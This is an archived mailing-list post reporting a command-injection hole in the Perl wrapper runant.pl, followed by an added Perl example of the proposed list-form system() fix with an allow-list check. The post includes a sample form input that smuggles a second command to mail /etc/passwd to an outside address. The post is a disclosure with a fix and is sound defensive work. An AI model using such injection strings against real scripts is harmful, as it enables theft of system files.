ant-dev mailing list archives

From Olivier Louchart-Fletcher <olivier.louch...@netregistry.au.com>
Subject potential security hole in runant.pl
Date Tue, 03 Oct 2000 23:02:02 GMT

Hi ant

this is from runant.pl:

> #######################################################################
> #
> # runant.pl
> #
> # wrapper script for invoking ant in a platform with Perl installed
> # this may include cgi-bin invocation, which is considered somewhat  daft.

actually this script would not be the best in a cgi env because of this
line at the end:

> system $COMMAND;
>


So in a cgi environment, if the user types, let's say, 'clean' in a form
submission, then this script will run something like:

  system ("java org.apache.tools.ant.Main clean");

which is fine.

now if the same user types:  ' ; mail me@somehost.org < /etc/passwd'

the script will happily execute:

  system ("java org.apache.tools.ant.Main ; mail me@somehost.org < /etc/passwd");

which is less fine as it will send the passwd file to a friend.



The fix is to use the multi-param version of 'system'.

e.g.:

  system ($JAVACMD, @OTHER_ARGS);

in this case only $JAVACMD is given to the shell interpreter; the other
args are NOT, but are directly forwarded to the command as an ascii stream.

Regards.

-- 
Olivier.


NetRegistry     http://www.netregistry.au.com
olivierl@netregistry.au.com
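
The multi-parameter system call proposed in the message above, as an added example that is not part of the original post or of runant.pl. It goes one step further and adds an allow-list check on the target name; a child Perl process stands in for the java command, and the sample inputs, the @CMD array and valid_target() are assumptions made for this illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

$| = 1;    # keep parent and child output in order

# Stand-in for "$JAVACMD org.apache.tools.ant.Main" (assumption): a child
# Perl process that prints each argument it receives, in brackets.
my @CMD = ($^X, '-e', 'print "  child got: [$_]\n" for @ARGV');

# Constructed sample inputs; the second carries a shell metacharacter.
my @inputs = ('clean', 'clean; echo INJECTED');

# Assumed policy for this example: a target name consists only of
# letters, digits, dot, underscore or hyphen.
sub valid_target {
    my ($t) = @_;
    return $t =~ /\A[A-Za-z0-9._-]+\z/ ? 1 : 0;
}

for my $target (@inputs) {
    print "input: <$target>\n";

    # List form of system(): with more than one list element Perl runs
    # the program directly, so ';' and '<' are never parsed as shell
    # syntax and the whole string arrives as one literal argument.
    my $rc = system(@CMD, $target);
    warn "child exited with status ", $rc >> 8, "\n" if $rc != 0;

    # Defence in depth: a wrapper would refuse anything that is not a
    # plain target name before handing it to the build tool.
    print valid_target($target) ? "  accepted\n" : "  rejected\n";
}
```

For the second input the child prints the whole string, semicolon included, as a single bracketed argument, and the allow-list check rejects it.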


